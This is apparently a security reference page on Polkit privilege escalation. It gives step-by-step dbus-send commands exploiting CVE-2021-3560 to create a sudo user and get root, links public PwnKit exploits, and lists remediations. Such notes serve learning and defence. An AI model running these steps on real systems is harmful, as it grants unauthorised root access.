PolKit Privilege Escalation

Polkit (PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones.

CVE-2021-3560

1. Send a dbus message to create a new user

Create a new user by sending a dbus message.

# string:tester: The new user named "tester".
# string:"Tester Account": The description of the new user.
# int32:1: sudo group
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:tester string:"Tester Account" int32:1 & sleep 0.005s; kill $!

Then check the new user ID (uid).

id tester

uid=1000(tester) gid=1000(tester) groups=1000(tester),27(sudo)

2. Generate a new password hash

# -6: SHA512
openssl passwd -6 password123

Copy the output hash.

3. Send a dbus message to set a new password

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'<password_hash>' string:'Ask the tester' & sleep 0.005s; kill $!

4. Switch the new user

su tester

Enter the password you created e.g. “password123”. Now change to root .

sudo -s
# or
sudo su root

CVE-2021-4034 (PwnKit)

PwnKit is vulnerability of Polkit to local privilege escalation. There are many exploits available. Below are examples:

• https://github.com/arthepsy/CVE-2021-4034

• https://github.com/ly4k/PwnKit

• https://github.com/berdav/CVE-2021-4034

• https://github.com/Almorabea/pkexec-exploit (this is written by Python)

Remediations

To avoid the vulnerability, unset setuid from the pkexec executable.

sudo chmod 0755 /usr/bin/pkexec
# or
sudo chmod 0755 `which pkexec`

Or simply upgrade the apt packages in most of distributions which are patched for the vulnerability.

sudo apt update && sudo apt upgrade

References

• Qualys